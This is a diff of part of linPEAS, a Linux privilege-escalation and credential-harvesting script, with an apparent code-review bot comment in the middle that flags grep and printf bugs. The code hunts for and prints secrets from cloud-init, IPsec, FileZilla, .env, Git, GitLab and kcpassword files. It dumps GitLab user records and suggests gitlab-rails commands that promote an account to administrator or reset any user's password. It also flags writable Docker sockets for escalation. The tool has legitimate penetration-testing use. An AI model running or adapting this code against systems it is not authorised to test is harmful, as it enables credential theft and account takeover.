 if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo "";
- print_2title "Analyzing CloudFlare Files (limit 70)"
+ print_2title "Analyzing CloudFlare Files (limit 70)"
 if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo "";
- print_2title "Analyzing Erlang Files (limit 70)"
+ print_2title "Analyzing Erlang Files (limit 70)"
 if ! 
[ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing GMV Auth Files (limit 70)" + print_2title "Analyzing GMV Auth Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing IPSec Files (limit 70)" + print_2title "Analyzing IPSec Files (limit 70)" if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing IRSSI Files (limit 70)" + print_2title "Analyzing IRSSI Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Keyring Files (limit 70)" + print_2title "Analyzing Keyring Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Filezilla Files (limit 70)" + print_2title "Analyzing Filezilla Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then echo_not_found "filezilla"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Backup Manager Files (limit 70)" + print_2title "Analyzing Backup Manager Files (limit 70)" if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; if ! 
[ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; - ##-- SI) passwd files (splunk) - print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="$(command -v splunk 2>/dev/null)" - if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi - printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do - if [ -f "$f" ] && ! [ -x "$f" ]; then - echo "passwd file: $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," - fi - done - echo "" - - print_2title "Analyzing kcpassword files" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" - printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do - echo "$f" | sed -${E} "s,.*,${SED_RED}," - base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - done - echo "" - - ##-- SI) Gitlab - print_2title "Searching GitLab related files" - #Check gitlab-rails - if [ "$(command -v gitlab-rails)" ]; then - echo "gitlab-rails was found. Trying to dump users..." 
- gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," - echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" - echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" - echo "" +##-- SI) passwd files (splunk) +print_2title "Searching uncommon passwd files (splunk)" +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi +printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," fi - if [ "$(command -v gitlab-backup)" ]; then - echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" - echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" - echo "" - fi - #Check gitlab files - printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do - if echo $f | grep -q secrets.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" - elif echo $f | grep -q gitlab.yml; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -A 4 "repositories:" - elif echo $f | grep -q gitlab.rb; then - echo "Found $f" | sed "s,$f,${SED_RED}," - cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," - 
fi - echo "" - done - echo "" +done +echo "" - print_2title "Analyzing Github Files (limit 70)" +print_2title "Analyzing kcpassword files" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" +printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + echo "$f" | sed -${E} "s,.*,${SED_RED}," + base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +done +echo "" + +##-- SI) Gitlab +print_2title "Searching GitLab related files" +#Check gitlab-rails +if [ "$(command -v gitlab-rails)" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" +fi +if [ "$(command -v gitlab-backup)" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" +fi +#Check gitlab files +printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do + if echo $f | grep -q secrets.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" + elif echo $f | grep -q gitlab.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -A 4 "repositories:" + elif echo $f | grep -q gitlab.rb; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | 
sed -${E} "s,email|user|password,${SED_RED}," + fi + echo "" +done +echo "" + + print_2title "Analyzing Github Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Svn Files (limit 70)" + print_2title "Analyzing Svn Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; - print_2title "Analyzing PGP-GPG Files (limit 70)" + print_2title "Analyzing PGP-GPG Files (limit 70)" ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null (command -v netpgp || echo_not_found "netpgp") 2>/dev/null 
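Review bot: The re-indented Splunk block on the new side runs `grep "'pass'|'password'|'user'|'database'|'host'|\$"` without `-E`, so in that basic regular expression `|` is a literal character and the filter matches practically nothing — the passwd file's contents are never shown even though its path is flagged. If the alternation is meant (as the `sed -${E}` right after it assumes), the line should become `grep -E "'pass'|'password'|'user'|'database'|'host'|\\\$"`, where `\\\$` makes the last alternative a literal `$` instead of an end-of-line anchor that would match every line. The kcpassword loop just below has a related slip: `printf "%s\n" "$PSTORAGE_KCPASSWORD\n"` passes a literal backslash-n inside the argument, which `read` without `-r` folds into the last path; `printf "%s\n" "$PSTORAGE_KCPASSWORD"` is what the loop expects. The enclosing `if echo $CHECKS | grep -q SofI; then` block starts and ends outside this hunk.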
@@ -2938,127 +2900,127 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Cache Vi Files (limit 70)" + print_2title "Analyzing Cache Vi Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Wget Files (limit 70)" + print_2title "Analyzing Wget Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then echo_not_found ".wgetrc"; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; - ##-- SI) containerd installed - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=$(command -v ctr) - if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - ctr image list +##-- SI) containerd installed +print_2title "Checking if containerd(ctr) is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" +containerd=$(command -v ctr) +if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list +fi +echo "" + +##-- SI) runc installed +print_2title "Checking if runc is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" +runc=$(command -v runc) +if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," +fi +echo "" + +#-- SI) Docker +print_2title "Searching docker files (limit 70)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" +printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do + ls -l "$f" 2>/dev/null + if ! 
[ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi - echo "" +done +echo "" - ##-- SI) runc installed - print_2title "Checking if runc is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=$(command -v runc) - if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - fi - echo "" - - #-- SI) Docker - print_2title "Searching docker files (limit 70)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" - printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do - ls -l "$f" 2>/dev/null - if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - done - echo "" - - print_2title "Analyzing Firefox Files (limit 70)" + print_2title "Analyzing Firefox Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then echo_not_found "Firefox"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Chrome Files (limit 70)" + print_2title "Analyzing Chrome Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then echo_not_found "Chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Autologin Files (limit 70)" + print_2title "Analyzing Autologin Files (limit 70)" if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - #-- SI) S/Key athentication - print_2title "S/Key authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then - printf "System supports$RED S/Key$NC authentication\n" - if ! [ -d /etc/skey/ ]; then - echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif ! 
[ "$IAMROOT" ] && [ -w /etc/skey/ ]; then - echo "${RED}/etc/skey/ is writable by you" - ls -ld /etc/skey/ - else - ls -ld /etc/skey/ 2>/dev/null - fi +#-- SI) S/Key athentication +print_2title "S/Key authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then + echo "${RED}/etc/skey/ is writable by you" + ls -ld /etc/skey/ + else + ls -ld /etc/skey/ 2>/dev/null fi - echo "" +fi +echo "" - #-- SI) YubiKey athentication - print_2title "YubiKey authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then - printf "System supports$RED YubiKey$NC authentication\n" - if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then - echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ - else - ls -ld /var/db/yubikey/ 2>/dev/null - fi +#-- SI) YubiKey athentication +print_2title "YubiKey authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then + printf "System supports$RED YubiKey$NC authentication\n" + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then + echo "${RED}/var/db/yubikey/ is writable by you" + ls -ld /var/db/yubikey/ + else + ls -ld /var/db/yubikey/ 2>/dev/null fi - echo "" +fi +echo "" - #-- SI) Passwords inside pam.d - print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," - echo "" +#-- SI) Passwords inside pam.d +print_2title "Passwords inside pam.d" +grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," +echo "" - print_2title "Analyzing SNMP Files (limit 70)" + print_2title "Analyzing SNMP Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Pypirc Files (limit 70)" + print_2title "Analyzing Pypirc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Postfix Files (limit 70)" + print_2title "Analyzing Postfix Files (limit 70)" if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then echo_not_found "postfix"; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; for ff in $(find "$f" -name "master.cf"); do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing Ldaprc Files (limit 70)" + print_2title "Analyzing Ldaprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Env Files (limit 70)" + print_2title "Analyzing Env Files (limit 70)" if ! 
[ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[tT][oO][kK][eE][N]|[dD][bB],${SED_RED},g"; done; echo ""; - print_2title "Analyzing Msmtprc Files (limit 70)" + print_2title "Analyzing Msmtprc Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Keepass Files (limit 70)" + print_2title "Analyzing Keepass Files (limit 70)" if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; if ! 
[ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; - print_2title "Analyzing FTP Files (limit 70)" + print_2title "Analyzing FTP Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; 
